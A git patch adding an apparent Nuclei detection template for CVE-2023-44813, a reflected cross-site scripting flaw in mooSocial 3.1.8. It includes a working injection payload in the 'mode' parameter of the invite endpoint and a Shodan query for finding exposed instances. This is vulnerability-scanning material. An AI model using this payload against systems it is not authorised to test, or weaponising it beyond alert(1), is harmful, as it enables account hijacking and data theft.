From 3456d3574ff5c47c0f87351c853c5d4056f9b321 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 10:59:46 +0530 Subject: [PATCH] Create CVE-2023-44813.yaml --- http/cves/2023/CVE-2023-44813.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44813.yaml diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml new file mode 100644 index 0000000000..77040b15e1 --- /dev/null +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-44813 + +info: + name: mooSocial v.3.1.8 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function. + impact: | + Successful exploitation could lead to unauthorized access or data theft + remediation: | + Upgrade to a patched version of mooSocial + reference: + - https://github.com/ahrixia/CVE-2023-44813 + - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44813 + cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.28937 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: moosocial + product: moosocial + shodan-query: http.favicon.hash:702863115 + tags: cve,cve2023,moosocial,xss + +http: + - method: GET + path: + - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "initInviteFriendBtn('model');alert(1)//;" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200